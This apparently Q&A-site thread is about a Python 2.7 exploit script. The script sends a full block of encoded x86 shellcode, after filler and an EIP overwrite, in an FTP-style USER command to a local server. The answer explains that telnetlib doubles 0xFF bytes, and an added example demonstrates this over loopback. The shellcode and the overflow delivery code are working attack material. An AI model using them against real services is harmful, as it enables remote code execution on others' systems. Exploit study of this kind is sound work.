I was using a little shellcode in my python but failed
Problem description
Python version is 2.7.3.
Code is like this... The completed code is here: https://gist.github.com/3977494
import telnetlib  # added: the snippet below uses telnetlib.Telnet
# fill, eip_address and fill2 are defined in the full gist linked above
shellcode = bytearray(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
"\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
"\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
"\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
"\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
"\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
"\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
"\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
"\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
"\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
"\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
"\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
"\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
"\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
"\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
"\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
"\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
"\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
"\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
"\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
"\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
"\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
"\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
"\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
"\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
"\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
"\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a"
)
tn = telnetlib.Telnet('127.0.0.1', 11000)
user_string = "USER " + fill + eip_address + fill2 + shellcode + '\n'
tn.write(user_string)
pass_string = "PASS 123\n"
tn.write(pass_string)
My friend uses the same string in C and everything works well. When I check in OllyDbg, I find the command is different; it seems Python changes the encoding type. I don't know... Any help? It's driving me crazy.
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
"\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
"\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
"\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
"\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
"\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
"\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
"\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
"\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
"\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
"\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
"\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
"\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
"\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
"\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
"\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
"\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
"\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
"\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
"\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
"\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
"\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
"\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
"\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
"\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
"\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
"\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a";
Oh, I almost got it. At 00AEFD70 there are so many FF bytes. Why?
I wrote the same function in C++. Everything works right. Here is the comparison.
In other words, what happened here?
The telnetlib documentation indicates that (emphasis mine):
Write a string to the socket, doubling any IAC characters. This can block if the connection is blocked. May raise socket.error if the connection is closed.
The IAC character happens to be ASCII 255, which is '\xff'.
If you compare your two dumps: the IAC char FF is being doubled in the Python version, but not in the C version, which uses a raw socket; you could do that in Python too using the socket module.
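An added example (not code from the question, the answer or the linked gist) that makes the doubling visible end to end: it sends a constructed payload containing 0xff bytes to a loopback listener once through telnetlib and once over a raw socket, and returns exactly what arrived on the other side. It assumes Python 3 and a usable loopback TCP socket; where the stdlib no longer ships telnetlib, the telnetlib path applies the same documented IAC doubling by hand so the comparison still runs.

```python
import socket
import threading

IAC = b"\xff"  # Telnet "Interpret As Command" byte (RFC 854)


def telnet_escape(data: bytes) -> bytes:
    """What Telnet.write() does to outgoing data: every 0xff is doubled."""
    return data.replace(IAC, IAC + IAC)


def send_and_capture(payload: bytes, via_telnetlib: bool) -> bytes:
    """Deliver payload to a loopback listener and return the bytes it received.
    via_telnetlib=True goes through telnetlib (if the stdlib still has it, else the
    same escaping is applied by hand); False uses a raw socket like the C version."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port, loopback only
    srv.listen(1)
    host, port = srv.getsockname()
    received = bytearray()

    def serve():
        conn, _ = srv.accept()
        with conn:
            while chunk := conn.recv(4096):
                received.extend(chunk)

    t = threading.Thread(target=serve)
    t.start()
    if via_telnetlib:
        try:
            import telnetlib  # deprecated in 3.11, removed in 3.13
        except ImportError:
            telnetlib = None
        if telnetlib is not None:
            tn = telnetlib.Telnet(host, port)
            tn.write(payload)  # IAC bytes are silently doubled here
            tn.close()
        else:
            with socket.create_connection((host, port)) as c:
                c.sendall(telnet_escape(payload))
    else:
        with socket.create_connection((host, port)) as c:
            c.sendall(payload)  # raw socket: bytes go out exactly as given
    t.join()
    srv.close()
    return bytes(received)
```

The length difference between the two captures equals the number of 0xff bytes in the payload, which is why every byte after the first IAC lands at a shifted offset in the debugger dump.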